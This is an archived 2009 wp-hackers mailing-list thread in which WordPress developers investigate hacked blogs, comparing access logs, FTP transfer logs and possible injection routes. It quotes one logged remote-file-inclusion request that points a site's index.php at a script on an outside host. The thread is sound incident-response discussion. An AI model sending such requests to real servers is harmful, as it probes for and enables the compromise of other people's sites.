[wp-hackers] Hacked blogs

Joost de Valk joost at yoast.com
Thu Mar 26 16:07:23 GMT 2009


Yes I can, and it currently doesn't do anything...


Dinh Ba Thanh wrote:
> Can you try that URL on your web browser, since the remote file is 
> still up?
>
> Best Regards,
> Dinh Ba Thanh, Jason
> bathanh at gmail.com
>
>
>
>
> On Mar 27, 2009, at 12:00 AM, Joost de Valk wrote:
>
>> Exactly, it's a check.
>>
>> Going through the access logs I can't find anything else yet though, 
>> what we DO see on one of the hosts is that the "infected" files were 
>> uploaded through FTP (we can see that in the xfer.log), but if I'm 
>> not mistaken, that could still be done through XSS right?
>>
>> Dinh Ba Thanh wrote:
>>> If the attacker is able to inject that chunk of code, other things 
>>> could be include as well, eg: shell
>>>
>>> Best Regards,
>>> Dinh Ba Thanh, Jason
>>> bathanh at gmail.com
>>>
>>>
>>>
>>>
>>> On Mar 26, 2009, at 11:53 PM, Peter van der Does wrote:
>>>
>>>> On Thu, 26 Mar 2009 16:44:01 +0100
>>>> Joost de Valk <joost at yoast.com> wrote:
>>>>
>>>>> Nope, can't find a bloody thing yet. These kind of requests:
>>>>>
>>>>> GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
>>>>> HTTP/1.1
>>>>>
>>>>> in all the logs, but grepping through the entire htdocs dir, nothing
>>>>> that responds to them. 
>>>>
>>>> I don't believe that attack is what caused your problem.
>>>> The script that is called is a killroy script.
>>>> It will show server related information, like the OS, Uptime. Stuff
>>>> like that and "<insert name> was here .."
>>>>
>>>> -- 
>>>> Peter van der Does
>>>>
>>>> GPG key: E77E8E98
>>>>
>>>> WordPress Plugin Developer
>>>> http://blog.avirtualhome.com
>>>>
>>>> GetDeb Package Builder/GetDeb Site Coder
>>>> http://www.getdeb.net - Software you want for Ubuntu
>>>> _______________________________________________
>>>> wp-hackers mailing list
>>>> wp-hackers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-hackers 
>>>
>>> _______________________________________________
>>> wp-hackers mailing list
>>> wp-hackers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-hackers 
>> _______________________________________________
>> wp-hackers mailing list
>> wp-hackers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-hackers 
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers 


More information about the wp-hackers mailing list